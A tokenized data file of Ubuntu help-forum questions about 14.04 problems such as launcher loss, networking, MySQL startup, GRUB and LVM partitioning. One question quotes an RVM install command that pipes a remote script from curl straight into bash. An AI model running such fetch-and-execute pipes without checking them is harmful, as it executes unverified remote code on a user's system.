512348	problem with unity launcher in ubuntu 14.04 lts	i '' ve been using ubuntu for the last 3 months . i 've used various versions of windows , mac os and linux over the years . i know enough to be dangerous in linux but i 'm by no means an expert . my problem started when my system locked up after using a bug prone meshing program called netgen . after an hour of attempting to close the program i gave up and did a hard restart of my system . upon restart , the system checked and supposedly repaired several supposed damaged files and folders . when the repair was complete and logged back into my account , all of the programs which i had previously added to the launcher were gone . the only remaining programs listed in the launcher were the default libre office , mozilla firefox and various mounted drives . i googled for people with similar problems and have not been able to locate anyone with the same problem or a solutions for it . the missing programs are still installed on the system and i can still start them if i locate their executables . i 've tried to add them back to the launcher bar , without success . when i dragged them to the launcher they just refused too move into the launcher bar and bounce back to where they came from . i was also unable to remove any programs from the launcher bar . i did unlock one and that removed it from the launcher up until i restarted the system after which it reappeared i have been looking into the unity configuration files but as a novice i really do n't know what i need to change . i 'd like to find a way to recover the previous launcher , but i 'll settle for being able to add programs back to the launcher bar .
512349	virtualbox problem	im using the latest 14.04lts with the latest virtualbox ( i also have the latest extension pack ) . i have both windows 8 and 7 in there as im trying to put music on my new iphone . the guest os ' both cant detect my iphone or usbs but can detect my wireless logitech mouse . please help as i need to access my files of usbs and sync my phone with itunes to put music on there . thanks in advance .
512351	stuck at unresponsive ubuntu logo screen after upgrading to 14.04	when i upgraded to 14.04 and restarted the computer to finish the upgrade , ubuntu started to freez at the ubuntu logo with 5 orange dots screen . it did n't respond to esc or alt+f1 or f2 . however it responses to normal press of the computer 's shutdown button . i removed quiet splash from normal boot from the grub menu to see the code behind . what i notice is that the last lines are : starting virtualbox kernel modules ... done . saned disabled ; edit /etc/default/saned * restorting resolver state ... [ ok ] also i noted smb/cifs start 2 times but the second one shows a fail : * starting smb/cifs file and active directory server [ fail ] if this is n't enough i will work on providing the full log soon . device : hp microtower 3000 series video card : ati readon hd 5450
512353	no internet after upgrading from 12.04 to 14.04.1	i have a dell latitude with ethernet and wireless ( broadcomm ) adapters . they were both working fine on 12.04 . i upgraded to 14.04.1 via the software manager . since then i am unable to connect to the internet . some info : i can connect to my wireless router i do get dhcp info from my router for both wireless and ethernet when i boot to a sysrescuecd ( the current version ) , i get internet access on both ethernet and wireless . nm-tool shows me the same ip , prefix , gateway , and dns in sysrescuecd as i get in ubuntu . things i 've tried : - i 've tried setting the managed=true in the networkmanager.conf file - tried setting the ipv6 to ignored ( could not figure out how to disable it ) . - ping www.google.com fails ( i think the error is 'unknown host ' but i forgot to write it down ) any help or would be greatly appreciated ; my searching thus far has not seemed to find a universal cure ( the last 'cure ' i saw was a clean install of 14.04.1 ) thanks in advance . ** update ** azkerm and wild man , first off , thanks so much for your quick response - each time i use this forum , i am impressed by folks like you who are so willing . i was able to resolve the issue - see below - but if someone could please tell me why it resolved the issue , i think i 'll gain a better understanding . i was able to solve my issue by running sudo dhclient i found that in the following question at askubuntu can someone please let me know why this would solve the issue ?
512356	ubuntu 12.04 lts wo n't start up after an update	i need help in fixing my laptop . it wo n't boot up to the log in screen , it just displays the ubuntu loading screen . so , it happened after an update . because of steam , it wanted some drivers , so installed these drivers . after restarting my laptop , i noticed that the loading screen just does n't stop loading . p.s . - i am not completely new to ubuntu
512357	error installing rvm on ubuntu 12.04	i 'm taking a web applications development course on coursera that requires me to install ruby and rails . i 'm following the instructions at https : //class.coursera.org/webapplications-002/forum/thread ? thread_id=51 when i run the command sudo curl -l https : //get.rvm.io | bash -s stable -- ruby , i get the following error response : % total % received % xferd average speed time time time current dload upload total spent left speed 100 184 100 184 0 0 988 0 -- : -- : -- -- : -- : -- -- : -- : -- 1383 100 20758 100 20758 0 0 35274 0 -- : -- : -- -- : -- : -- -- : -- : -- 35274 downloading https : //github.com/wayneeseguin/rvm/archive/stable.tar.gz curl : ( 77 ) error setting certificate verify locations : cafile : /etc/pki/tls/certs/ca-bundle.crt capath : none it looks like you have old certificates , you can read more about it here : https : //rvm.io/support/fixing-broken-ssl-certificates/ downloading https : //bitbucket.org/mpapis/rvm/get/stable.tar.gz curl : ( 77 ) error setting certificate verify locations : cafile : /etc/pki/tls/certs/ca-bundle.crt capath : none it looks like you have old certificates , you can read more about it here : https : //rvm.io/support/fixing-broken-ssl-certificates/ googling for this error , it seems that this is specific to 12.04 . i have n't found a solution yet . any suggestions how to proceed ? as can be gauged from the fact that i 'm taking an introductory class on coursera , i 'm completely new to web server applications . thanks in advance !
512358	how can i access my bios settings now ?	i can not access my thinkpad e430c bios setting even i press any of my keys after installing ubuntu 14.04 32bit . help ! ! !
512359	web wireframe app	i am looking for a web wire frame app that can help me create the mock-up for a website . i am looking for one that is compatible with ubuntu 14.04 and can be installed if possible with a simple deb package . something like gomockingbird or similar sites but instead of a website , an app in ubuntu . big plus if it 's free in my current case .
512360	linux server network : admin privileges configuration	organisation network runs on ubuntu servers ( mail , file , print , ... ) . our group of colleagues has nothing to do with it network . we want a new server to serve us a few specific things ( mysql among others ) , and to serve whole organisation with some webapps . our server must also be ablo to access the existing file servers . thing is : we ourselves need be in charge of the services running on it , thus need administrator status on new server . design , configuration and administration of named services is completely ours . question is then : in the organisation 's linux network , how is created a user with admin status for a specific server/machine , without us having admin status with respect to the other servers ? i have no clue about linux network administration , i just know how to operate a linux server for our specific purposes . thanks for comments on whether granting privileges for a specific server only is easy , or not so easy to do .
512362	how to install canon pixma mx300 printer with ubuntu 14.04 lts ?	i have 14.04 lts . how do i setup my canon pixma mx300 printer ?
512363	recovery menu persistent live cd	i am attempting to get into the recovery menu console is there a difference entering recovery menu between installed and live cd persistent ? can rescue mode be entered on a live persistent usb ? i followed how do i reset a lost administrative password ? i also tried alternatives on lostpassword for how to enter recovery mode . is it correct that live cd ( persistent ) when booted holding left shift key will display the advanced welcome page . https : //help.ubuntu.com/community/bootoptions but not the rescue screen . i used live-usb to make the usb . f1 help displays one relevant item : f4 of ubuntu 14.04 persistent live usb : < f4 > additional boot methods ; rescuing a broken system . rescuing a broken system there is no dedicated rescue mode on this disc . however , since the disc provides a complete user environment , it is possible to use the command-line and/or graphical tools provided to rescue a broken system , and to use a web browser to search for help . thank you
512366	ubuntu 14.04 very slow even with video card	i installed ubuntu 14.04 on my computer that already had windows installed system . the graphical windows is very peforming due to the video card that i have installed . but the ubuntu was not so well . anything related to graphic is very slow in ubuntu . there 's something i can do to improve this peforming being that i have a video card my computer ? information follows the video card : ~ $ lspci -vnnn | perl -lne 'print if /^\d+\ : .+ ( \ [ \s+\ : \s+\ ] ) / ' | grep vga 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) thanks advance.. edit i followed all steps in this tutorial : http : //www.binarytides.com/install-nvidia-drivers-ubuntu-14-04/ but when i run : lspci -vnn | grep -i vga -a 12 at the end i have : kernel driver in use : nouveau and keep slow .
512368	install php tidy to sublime on ubuntu 14.04	i am using sublime text version build 3059 on ubuntu 14.04 . i want to install php tidy in my installed sublime . so can someone tell me how to install php tidy . i am using sublime text for the first time so i do n't know how to install plugins and repositories in it . so any help and suggestions will be really appreciable . thanks
512369	how do i update the openstack api access to be accessible from the outside world	my openstack install is working wonderful , with the exception that all api access urls are 192.168.x.x ... i have looked through a lot of postings and im still left confused . which commands do i use to allow openstack to have local lan ip and 'foo.com ' ( public ) api access ? i apologize if this has been posted before , i 'm not seeing it . thanks in advance !
512370	error installing netbeans8.0	i tried to install netbeans by sudo apt-get install netbeans but it was outdated and so i manually downloaded netbeans8.0 from this website . i get netbeans-8.0 linux.sh file which when i run using sudo sh ./netbeans ... ..sh command it starts the installer but it stops at 30 % and gives error unexpected exception occured in thread thread-2 exception : java.lang.outofmemoryerror : gc overhead limit exceeded netbeans site reports it as a bug but dose n't show how to resolve it .
512372	installing downloaded packages using dpkg	i have downloaded these packages using apt-get download : -rw-rw-r -- 1 sysuser sysuser 87534 jul 24 00:33 apache2_2.4.7-1ubuntu4.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 838846 jul 24 00:33 apache2-bin_2.4.7-1ubuntu4.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 159942 jul 24 00:33 apache2-data_2.4.7-1ubuntu4.1_all.deb -rw-rw-r -- 1 sysuser sysuser 1460 jul 24 00:33 apache2-mpm-prefork_2.4.7-1ubuntu4.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 6364 may 9 2013 libaio1_0.3.109-4_amd64.deb -rw-rw-r -- 1 sysuser sysuser 2210058 jul 9 20:53 libapache2-mod-php5_5.5.9+dfsg-1ubuntu4.3_amd64.deb -rw-rw-r -- 1 sysuser sysuser 85056 dec 31 2013 libapr1_1.5.0-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 76376 dec 10 2013 libaprutil1_1.5.3-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 10538 dec 10 2013 libaprutil1-dbd-sqlite3_1.5.3-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 8634 dec 10 2013 libaprutil1-ldap_1.5.3-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 99300 nov 7 2013 libdbd-mysql-perl_4.025-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 879494 nov 5 2013 libdbi-perl_1.630-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 65450 oct 23 2013 libhtml-template-perl_2.95-1_all.deb -rw-rw-r -- 1 sysuser sysuser 594082 jul 17 18:39 libmysqlclient18_5.5.38-0ubuntu0.14.04.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 27364 oct 30 2013 libterm-readkey-perl_2.31-1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 46166 jan 13 2014 libwrap0_7.6.q-25_amd64.deb -rw-rw-r -- 1 sysuser sysuser 1454470 jul 17 18:39 mysql-client-5.5_5.5.38-0ubuntu0.14.04.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 701248 jul 17 18:39 mysql-client-core-5.5_5.5.38-0ubuntu0.14.04.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 14102 jul 17 18:39 mysql-common_5.5.38-0ubuntu0.14.04.1_all.deb -rw-rw-r -- 1 sysuser sysuser 12444 jul 17 18:39 mysql-server_5.5.38-0ubuntu0.14.04.1_all.deb -rw-rw-r -- 1 sysuser sysuser 1943588 jul 17 18:39 mysql-server-5.5_5.5.38-0ubuntu0.14.04.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 3212772 jul 17 18:39 mysql-server-core-5.5_5.5.38-0ubuntu0.14.04.1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 2162966 jul 9 20:53 php5-cli_5.5.9+dfsg-1ubuntu4.3_amd64.deb -rw-rw-r -- 1 sysuser sysuser 439938 jul 9 20:53 php5-common_5.5.9+dfsg-1ubuntu4.3_amd64.deb -rw-rw-r -- 1 sysuser sysuser 34410 feb 18 18:39 php5-json_1.3.2-2build1_amd64.deb -rw-rw-r -- 1 sysuser sysuser 62840 jul 9 20:53 php5-mysql_5.5.9+dfsg-1ubuntu4.3_amd64.deb -rw-rw-r -- 1 sysuser sysuser 12076 jul 9 20:53 php5-readline_5.5.9+dfsg-1ubuntu4.3_amd64.deb -rw-rw-r -- 1 sysuser sysuser 16650 aug 27 2013 ssl-cert_1.0.33_all.deb -rw-rw-r -- 1 sysuser sysuser 22988 jan 13 2014 tcpd_7.6.q-25_amd64.deb is there an specific order for installation or i can just install them from top to bottom
512373	how to add the intel_pstate=enable command to the kernel on an efi-only system ?	i 've tried editing the refind.conf file and i can not get that to work . is there any way to edit the entry that refind auto-detects ? grub is not installed . the host computer is a macbook pro 11,1 .
512375	mysql fails to start after upgrade	i had mysql working fine , and then i upgraded from 5.1 to 5.5 . now i think it was still working after the upgrade , but i 'm doubting myself now that i ca n't get it started again . i have looked at the other similar questions , and none solved my problem . i incorrectly backed up my database , an so any solution which involves reinstalling is not going to be helpful . output of /var/log/mysql/error.log : 140816 22:35:52 innodb : shutdown completed ; log sequence number 2316910 140816 22:35:52 [ note ] 140816 22:35:53 [ note ] plugin 'federated ' is disabled . 140816 22:35:53 innodb : the innodb memory heap is disabled 140816 22:35:53 innodb : mutexes and rw_locks use gcc atomic builtins 140816 22:35:53 innodb : compressed tables use zlib 1.2.8 140816 22:35:53 innodb : using linux native aio 140816 22:35:53 innodb : initializing buffer pool , size = 128.0m 140816 22:35:53 innodb : completed initialization of buffer pool 140816 22:35:53 innodb : highest supported file format is barracuda . 140816 22:35:53 innodb : waiting for the background threads to start 140816 22:35:54 innodb : 5.5.38 started ; log sequence number 2316910 140816 22:35:54 [ error ] aborting 140816 22:35:54 innodb : starting shutdown ... i have tried starting it several ways , and all give me the same messages ( and in most cases , it just hangs on the command line , then silently fails ) . when running sudo /etc/init.d/mysql start , it does show : '* starting mysql database server mysqld [ fail ] i 'm not exactly sure what the problem is , but it looks like the background threads are n't starting . any ideas as to what to try ? edit : after starting with /usr/bin/mysqld_safe -v , i get the following output : 140817 11:22:31 mysqld_safe ca n't log to error log and syslog at the same time . remove all -- log-error configuration options for -- syslog to take effect . 140817 11:22:31 mysqld_safe logging to '/var/log/mysql/error.log ' . 140817 11:22:31 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql /usr/bin/mysqld_safe : 126 : /usr/bin/mysqld_safe : can not create /var/log/mysql/error.log : permission denied /usr/bin/mysqld_safe : 1 : eval : can not create /var/log/mysql/error.log : permission denied 140817 11:22:31 mysqld_safe mysqld from pid file /var/run/mysqld/mysqld.pid ended /usr/bin/mysqld_safe : 126 : /usr/bin/mysqld_safe : can not create /var/log/mysql/error.log : permission denied ( i did chmod -r 755 /var/log/mysql , and still the same errors persist . the owner of /var/log/mysql is mysql ) when run as superuser , the errors are as follows : 140817 12:01:50 mysqld_safe ca n't log to error log and syslog at the same time . remove all -- log-error configuration options for -- syslog to take effect . 140817 12:01:50 mysqld_safe logging to '/var/log/mysql/error.log ' . 140817 12:01:50 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql 140817 12:01:53 mysqld_safe mysqld from pid file /var/run/mysqld/mysqld.pid ended
512377	crash in 14.04 after login	14.04 crashes after login . can access tty1 but login does n't work . tty1 login is same as main login . have no other way to access terminal to run the updates . help ?
512378	i have windows 7 running in virtual box and want to get it into full screen mode	i installed windows 7 in virtual box and i cant get it into full screen mode.when i click switch to full screen the box goes full screen but windows 7 does not .
512379	loading shared object lib jansson.so.4 - error	a binary is launched using execve command . in such a case , i am getting a permission denied error to load the lib jansson.so.4 . ( i had pasted the lib jansson.so.4.4.0 and created a soft link to lib jansson.so.4 ) . the binary runs fine if run separately through command line both as root and normal user . i tried to keep the jansson libraries in the home folder and try to load it with ld_library_path and ld_preload variables . ld preload fails to load and says it ignored it . ld library path checks the path given but does n't pick it from there and keeps checking in other defaults library paths . can any one help me with this .. thanks , sathish
512380	installing grub for ubuntu 14.04 from ubuntu 13.10 live dvd	i had installed windows 7 recently and thereby lost my grub . but my linux partition is still there ... i had ubuntu 14.04 installed previously . i want to reinstall the grub from a live cd.but i do n't have the live cd of ubuntu 14.04 , i only have the live cd of ubuntu 13.10 ... is it okay to install grub from it ?
512381	application not found via the `` search your computer and online resources '' ubuntu button	ubuntu software center says i have installed padre . green checkmark next to installed . and over on the right it has a remove button . but if i click on the top left corner icon and then type `` padre '' i only get reference , weather and more suggestions entries . no application to launch . it also does not show up if i right click on that top-left-corner button and look for it in the list of applications icons . but the software did install . `` which padre '' in a terminal window shows `` /usr/bin/padre '' . and `` padre & '' in a terminal window brings up the application . is this a bug or a feature ? do you have to do additional work to get a program like padre ( a perl ide ) to show up in search , or is it just a glitch in the system ? on a menu-based system like kde or xfce there would automatically be a new item in the menu for padre . is this not the case for ubuntu unity ( not menu since there is none , but searchable ) ?
512382	plex not detecting media on amazon s3 mounted with s3ql	so i have had a plex server for a while now , and it has been running on a dell poweredge 2850 and dell powervault 220s . ever since this server has been running , our power bill has been way more than usual for an obvious reason . i recently decided to test migrating everything to the cloud just to make everything a lot simpler , and for a fun project . i am now trying to use amazon s3 for file storage and digital ocean with ubuntu 14.04 to host the transcoding computer . i have had partial success , but am having trouble getting plex to discover any media on the mounted s3 drive . i use transmit to sftp to the droplet from digital ocean and see the mounted s3 folder and media , but when i pull up plex and point it to the destination , it does n't see anything inside the folder . i am thinking this is a permissions error with the folder , but i ran chmod 777 for the folder where the s3 bucket was mounted , but plex still sees nothing in the folder . i tried this with fuse as well and had the same result , but am going with s3ql because it uploads files in 10mb chunks , so the entire file is n't required to access one part of one file , therefore saving time and bandwidth . here are the guides i used : plex install : https : //forums.plex.tv/index.php/topic/26727-how-to-plex-media-server-on-ubuntu/ s3ql install : http : //ubuntuservergui.com/ubuntu-server-guide/mount-s3-ubuntu-server i also ran sudo gpasswd -a plex plugdev to give plex more permissions .
512383	how do i compress a directory auto use directory name ?	i have to assign file name when i use tar tar -zcvf xxx.tar.gz /home/xxx i always use history command , and alter the directory name and tar file name.i would make mistake at sometime to input a exist tar file name , then that file would be cover ... right click menu of winrar in windows have a option 'compress to xxx ' , can auto create a rar file with the directory name . how can i achieve this in ubuntu ?
512389	window vertically maximized beyond desktop size	after navigating through the system setting to do post install tweaks on ubuntu gnome 14.04.1 , i have a problem with the sound settings window in that it is vertically maximized way beyond my desktop size . i have not seen the issue with any other windows thus far with any other setting windows or applications . any help would be greatly appreciated in getting the window resized .
512390	mrsid support for qgis 2.4 in ubuntu 14.04	i am trying to get mrsid support in qgis 2.4 in ubuntu 14.04 . according to the this tutorial you have to rebuild libgdal against mrsid sdk from lizardtech . but i can not find the package libgdal-mrsid-src as mentioned in the instructions . however , it appears that this may have been merged into the libgdal-dev package . when i attempt to install this package , i am told that i have to install libmysqlclient-dev but can not install libmysqlclient-dev since i have mariadb 10 installed . full error message is : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libmysqlclient-dev : depends : libmysqlclient18 ( = 5.5.38-0ubuntu0.14.04.1 ) but 10.0.10+maria-1~saucy is to be installed e : unable to correct problems , you have held broken packages so here are my original two questions : am i correct about the libgdal-mrsid-src package being merged with the libgdal-dev package ? answer : yes but you have to use apt-get source libgdal-dev if the answer to 1 is yes , then how do i correct conflict and still keep mariadb 10 ? answer : this seems to be more of a red herring as i am uncertain that libgdal-dev really needs to be installed . however , if you run apt-get install libgdal-dev libmariadbclient-dev the dependencies appear to be met . now i am to the point where i getting unsure of my steps . in the gdal-1.10.1+dfsg directory that is created from installing the sources , i run ./configure -- with-gdal=/usr/bin/gdal-config \ -- with-mrsid=/path/to/mrsid_dsdk/raster_dsdk \ -- with-mrsid_lidar=/path/to/mrsid_dsdk/lidar_dsdk \ -- with-jp2mrsid=yes -- with-geotiff=yes make make install however , this builds the full gdal package and installs it in /usr/local/bin instead of /usr/bin ( apt-get install location ) . this package also does not have mysql support ( guess question 2 may not be such a red herring after all ) . not to mention , it is not my intention to build the full package from source . the other option that i tried was to just compile the mrsid plugin for gdal . stopping the above instructions after the configure command , i changed to the /gdal-1.10.1+dfsg/frmts/mrsid directory and ran make plugin libgdal-mrsid which produced the following error : /bin/bash /root/gdal-1.10.1+dfsg/libtool -- mode=compile -- tag=cxx g++ -g -o2 -dhave_sse_at_compile_time -wall -i/root/gdal-1.10.1+dfsg/port -i/root/gdal-1.10.1+dfsg/gcore -i/root/gdal-1.10.1+dfsg/alg -i/root/gdal-1.10.1+dfsg/ogr -i/root/gdal-1.10.1+dfsg/ogr/ogrsf_frmts -dmrsid_j2k -i/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include -i../../frmts/gtiff/libgeotiff -dogr_enabled -d_reentrant -i/root/gdal-1.10.1+dfsg/port -c -o mrsiddataset.o mrsiddataset.cpp libtool : compile : g++ -g -o2 -dhave_sse_at_compile_time -wall -i/root/gdal-1.10.1+dfsg/port -i/root/gdal-1.10.1+dfsg/gcore -i/root/gdal-1.10.1+dfsg/alg -i/root/gdal-1.10.1+dfsg/ogr -i/root/gdal-1.10.1+dfsg/ogr/ogrsf_frmts -dmrsid_j2k -i/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include -i../../frmts/gtiff/libgeotiff -dogr_enabled -d_reentrant -i/root/gdal-1.10.1+dfsg/port -c mrsiddataset.cpp -fpic -dpic -o .libs/mrsiddataset.o mrsiddataset.cpp : in member function 'virtual cplerr mrsidrasterband : :ireadblock ( int , int , void* ) ' : mrsiddataset.cpp:552:64 : warning : 'void* lizardtech : :ltiscenebuffer : :gettotalbanddata ( lt_uint16 ) const ' is deprecated ( declared at /usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include/lti_scenebuffer.h:565 ) [ -wdeprecated-declarations ] memcpy ( pimage , pogds- > pobuffer- > gettotalbanddata ( nband - 1 ) , ^ mrsiddataset.cpp : in member function 'virtual cplerr mrsiddataset : :irasterio ( gdalrwflag , int , int , int , int , void* , int , int , gdaldatatype , int , int* , int , int , int ) ' : mrsiddataset.cpp:979:68 : warning : 'void* lizardtech : :ltiscenebuffer : :gettotalbanddata ( lt_uint16 ) const ' is deprecated ( declared at /usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include/lti_scenebuffer.h:565 ) [ -wdeprecated-declarations ] oltibuffer.gettotalbanddata ( panbandmap [ iband ] - 1 ) ; ^ mrsiddataset.cpp:1017:47 : warning : 'void* lizardtech : :ltiscenebuffer : :gettotalbanddata ( lt_uint16 ) const ' is deprecated ( declared at /usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include/lti_scenebuffer.h:565 ) [ -wdeprecated-declarations ] panbandmap [ iband ] - 1 ) ; ^ libtool : compile : g++ -g -o2 -dhave_sse_at_compile_time -wall -i/root/gdal-1.10.1+dfsg/port -i/root/gdal-1.10.1+dfsg/gcore -i/root/gdal-1.10.1+dfsg/alg -i/root/gdal-1.10.1+dfsg/ogr -i/root/gdal-1.10.1+dfsg/ogr/ogrsf_frmts -dmrsid_j2k -i/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include -i../../frmts/gtiff/libgeotiff -dogr_enabled -d_reentrant -i/root/gdal-1.10.1+dfsg/port -c mrsiddataset.cpp -o mrsiddataset.o > /dev/null 2 > & 1 /bin/bash /root/gdal-1.10.1+dfsg/libtool -- mode=compile -- tag=cxx g++ -g -o2 -dhave_sse_at_compile_time -wall -i/root/gdal-1.10.1+dfsg/port -i/root/gdal-1.10.1+dfsg/gcore -i/root/gdal-1.10.1+dfsg/alg -i/root/gdal-1.10.1+dfsg/ogr -i/root/gdal-1.10.1+dfsg/ogr/ogrsf_frmts -dmrsid_j2k -i/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include -i../../frmts/gtiff/libgeotiff -dogr_enabled -d_reentrant -i/root/gdal-1.10.1+dfsg/port -c -o mrsidstream.o mrsidstream.cpp libtool : compile : g++ -g -o2 -dhave_sse_at_compile_time -wall -i/root/gdal-1.10.1+dfsg/port -i/root/gdal-1.10.1+dfsg/gcore -i/root/gdal-1.10.1+dfsg/alg -i/root/gdal-1.10.1+dfsg/ogr -i/root/gdal-1.10.1+dfsg/ogr/ogrsf_frmts -dmrsid_j2k -i/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include -i../../frmts/gtiff/libgeotiff -dogr_enabled -d_reentrant -i/root/gdal-1.10.1+dfsg/port -c mrsidstream.cpp -fpic -dpic -o .libs/mrsidstream.o libtool : compile : g++ -g -o2 -dhave_sse_at_compile_time -wall -i/root/gdal-1.10.1+dfsg/port -i/root/gdal-1.10.1+dfsg/gcore -i/root/gdal-1.10.1+dfsg/alg -i/root/gdal-1.10.1+dfsg/ogr -i/root/gdal-1.10.1+dfsg/ogr/ogrsf_frmts -dmrsid_j2k -i/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/include -i../../frmts/gtiff/libgeotiff -dogr_enabled -d_reentrant -i/root/gdal-1.10.1+dfsg/port -c mrsidstream.cpp -o mrsidstream.o > /dev/null 2 > & 1 mrsiddataset.o mrsidstream.o -l/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/3rd-party/lib -l/usr/share/mrsid_dsdk-9.1.0.4045/raster_dsdk/lib -lltidsdk -lpthread -o gdal_mrsid.so /bin/bash : mrsiddataset.o : command not found make : *** [ gdal_mrsid.so ] error 127 i 'm about ready to give up on adding mrsid support , but i ca n't help but feel that i am close and just need to fix a little step here or there .
512391	what webcam is compatible with ubuntu ?	which webcam is compatible to ubuntu 14.04 ? have tried logitech c270 , but it is only for windows .
512393	network issue in 14.04 to solaris 10 in vmware 10	i have ubuntu 14.04 installed my lenovo laptop . there i installed solaris 10 on on vmware 10 . and i configured network interfaces in ubuntu ( eth0 ) & solaris 10 ( e1000g0 ) . i gave ip address for ubuntu - 192.168.170.5 , solaris - 192.168.170.8 , vmnet0 - 192.168.170.1 , vmnet1 - 192.168.170.2 , vmnet8 -192.168.170.6 , net mask - 255.255.255.0 and all virtual networks are in nat.now i can ping vmnet0 , vmnet1 & vmnet8 from ubuntu but not able to ping from solaris and also not able to ping ubuntu from solaris . but if i down the ubuntu ( eth0 ) i can able to ping solaris and able to telnet , but not able to ping and telnet from solaris to ubuntu . my question is what i have to do to ping or telnet from solaris to ubuntu . is there any way to connect internet to solaris ? kindly help me on this .
512395	how do you prevent the 2nd page in a pagestack from running ?	i may be missing something here but i 'm not sure why the code is running before page 2 should be loaded . http : //pastebin.ubuntu.com/8068379/ and is there any way to prevent the functions and code within page 2 from running before the button is pressed ?
512399	increase default ubuntu sound volume ?	i installed ubuntu 12.04 lts and the volume is too low for me . even when i adjust to 100 % volume , i can only hear a little from music . i know that i can open the sound control and adjust to 150 % volume , but if i want to use the mouse to adjust the sound icon on the status bar , i can not adjust to 150 % . so , is there any way to increase the default volume ?
512401	12.04 to 14.04 music files with the wrong names	ok i just went from 12.04 to 14.04 and when i opened my music player ( rhythmbox ) all the songs wore messed up and had the wrong names . i un-installed the music player and re-installed it along with many other players and they all are listing the songs with the wrong names . how can i fix this with out re-naming over 2k songs ?
512407	games eboard chess	when i move a chess piece , the piece will not stay in the selected square . i select peer , play against engine , select crafty or gnu chess . page appears , click ok , then both page and chessboard disappears from the ubuntu screen . i downloaded xboard for comparison and the file appears under dash , but i do n't know how to activate it . same goes for any other downloaded file . i would like to move these files to the launcher , but wonder if that would be enough to get them working . i have achieved a passing familiarity with ubuntu to date ( windows xp past experience ) and i suspect that i am lacking an understanding of how files , folders , programs work in ubuntu , so any direction from the community will be helpful , i 'm sure . i upgraded to 14.04 yesterday and use gui only . command line usage is in the distant future , if at all .
512409	some issues on asus x550lc ( dual boot with ubuntu 14.04 and windows 8 )	i have dual boot ( ubuntu 14.04 and windows 8 ) on my asus x550lc . windows is working fine . but i have found some issues when i am running ubuntu . bluetooth is not working . brightness is going 100 % after every reboot . brightness and network controlling key in keyboard is not working . network led ( which should be green when connected with internet ) is not working . to solve brightness issue i have tried first and second solution from this question , but that does not worked . to solve bluetooth , i have tried blueman from software center , but that does not worked .
512411	entire hdd is one big lvm2-pv , hence unable to resize partitions or even bring back windows	**the history** i have a samsung np300 e5c laptop with 8gb ram and a 750gb hdd . i bought it as freedos . then i installed windows 8.1 pro 64 bit os in it . then i wanted to go for ubuntu . i installed ubuntu 14.04.1 via usb after burning the .iso file of it from the official download webpage . looking at some tutorials i found on the internet , i wanted all of my laptop to run only on ubuntu , so taking heed of those instructions , i went for the `` erase disk '' and `` guided install with lvm '' . now , after successfully installing ubuntu on my laptop , i was happy except that there were no partitions or drives . i just had one big 698gb lvm2-pv partition on which ubuntu was installed . tutorials in this website told me about gpart , lvm partition tool , and also partitioning via live cd/dvd . but i learnt gpart and lvm p-tool can be used only when the concerned drive is unmounted , and hence i tried live booting , this time both from usb as well dvd , but to no avail . it straightaway boots to the ubuntu login screen . i had disabled fastboot and set the boot priorities right in the bios too , but still i ca n't use any of those tools because i ca n't boot off from the usb or live dvd . windows setup in usb and dvd too is ignored because there are n't any free partitions on my hdd . **so where do i want help exactly** right now , i have a 750gb hdd of my laptop running ubuntu 14.04.1 in a single partition which is lvm2-pv in nature . its size is roughly around 698gb according to its `` properties '' . what i want is , i want to divide it , shrink it in some way , so that i have some free space to install windows alongside ubuntu . i do not mind if you suggest something to make my laptop freedos again . i can install windows then , and then proceed ( carefully ) installing ubuntu the way i want again . please help me . i am new to linux distros , so please be a little detailed in your explanations . there is no data i want to save . i had backed up everything . so any type of suggestions are welcome . thank you . : ) p.s . i can not access bios anymore , i do not know why , but i can still access the grub menu .
512412	dual boot fails after updating ubuntu 14.04 on a dual boot machine with windows 8 on toshiba machine	last year i purchased a toshiba machine with windows 8 preinstalled . after hard time , i managed to have dual boot on both os . but accidentally , i updated ubuntu and now i can not get the dual boot screen and the machine boots directly to windows . 1 ) i tried the boot-repair and in the end i get `` an error occurred during repair '' , and i get the following report the report it did not work 2 ) i tried also , on a command prompt as admin , to run the command `` bcdedit /set { bootmgr } \efi\ubuntu\grubx64.efi '' it did not work do you have any other suggestions ? thank you in advance , zampeta
512413	preserving lvm partitions while installing ubuntu	i decided to make the switch from opensuse to ubuntu . i use lvm with opensuse and i wan na have my partitions in ubuntu . the only option i see in installation is to erase everything and use lvm which i ca n't use and `` do something else '' which says `` use lvm for encryption '' which is not useful . how can i keep my current virtual partitions under ubuntu ? thanks in advance ,
512415	grub rescue unknown filesystem error	i have an hcl me laptop which has a built in windows 7 os . 3 days before i have installed windows 8 along with windows7 . yesterday i have downloaded ubuntu 14.04 iso and installed it using portable usb which created a new harddisk drive , but today when i opened it , it shows unknown file system grub rescue error .
